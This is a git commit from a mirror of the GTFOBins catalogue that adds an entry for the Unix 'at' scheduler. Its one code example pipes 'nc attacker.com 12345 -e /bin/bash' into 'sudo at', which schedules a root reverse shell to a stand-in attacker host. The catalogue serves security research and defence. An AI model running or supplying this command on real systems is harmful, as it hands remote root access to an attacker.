1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
This commit is contained in:
Aman Rawat 2021-01-10 22:15:01 +05:30 committed by Andrea Cardaci
parent bb4050810e
commit e241cd3aa7

8
_gtfobins/at.md Normal file

@ -0,0 +1,8 @@
---
description: |
at is a command-line utility that allows you to schedule commands to be executed at a particular time.
functions:
sudo:
- code: |
echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes
---